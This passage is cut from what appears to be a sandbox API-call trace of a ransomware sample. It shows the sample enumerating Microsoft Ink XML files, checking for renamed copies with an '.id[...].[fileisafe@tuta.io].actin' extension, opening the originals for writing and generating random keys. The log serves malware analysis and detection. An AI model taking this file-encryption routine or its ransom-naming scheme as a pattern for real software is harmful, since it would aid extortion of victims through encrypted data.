shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml")) returned 0x20 [0146.760] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.760] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.761] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=392) returned 1 [0146.761] CloseHandle (hObject=0x304) returned 1 [0146.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml")) returned 0x20 [0146.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.761] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.761] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.762] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=693) returned 1 [0146.762] CloseHandle (hObject=0x304) returned 1 [0146.762] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml")) returned 0x20 [0146.762] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.762] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.763] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3333) returned 1 [0146.763] CloseHandle (hObject=0x304) returned 1 [0146.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml")) returned 0x20 [0146.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.763] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.765] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=247) returned 1 [0146.765] CloseHandle (hObject=0x304) returned 1 [0146.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml")) returned 0x20 [0146.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.765] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.766] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3524) returned 1 [0146.766] CloseHandle (hObject=0x304) returned 1 [0146.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml")) returned 0x20 [0146.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.766] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.766] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3529) returned 1 [0146.766] CloseHandle (hObject=0x304) returned 1 [0146.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml")) returned 0x20 [0146.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.767] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.767] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.767] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=738) returned 1 [0146.767] CloseHandle (hObject=0x304) returned 1 [0146.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml")) returned 0x20 [0146.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.767] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.768] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.768] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=804) returned 1 [0146.768] CloseHandle (hObject=0x304) returned 1 [0146.768] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml")) returned 0x20 [0146.768] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.768] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.768] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=488) returned 1 [0146.769] CloseHandle (hObject=0x304) returned 1 [0146.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml")) returned 0x20 [0146.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.769] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.769] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=617) returned 1 [0146.769] CloseHandle (hObject=0x304) returned 1 [0146.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml")) returned 0x20 [0146.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.769] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.770] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=16616) returned 1 [0146.770] CloseHandle (hObject=0x304) returned 1 [0146.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml")) returned 0x20 [0146.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.770] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.770] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=15097) returned 1 [0146.770] CloseHandle (hObject=0x304) returned 1 [0146.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml")) returned 0x20 [0146.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.771] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.771] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=9803) returned 1 [0146.771] CloseHandle (hObject=0x304) returned 1 [0146.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml")) returned 0x20 [0146.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.771] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.772] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=11067) returned 1 [0146.772] CloseHandle (hObject=0x304) returned 1 [0146.772] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml")) returned 0x20 [0146.772] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.772] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.772] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.772] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.775] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10947) returned 1 [0146.775] CloseHandle (hObject=0x2f4) returned 1 [0146.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml")) returned 0x20 [0146.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.775] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.775] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=44506) returned 1 [0146.776] CloseHandle (hObject=0x2f4) returned 1 [0146.776] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft 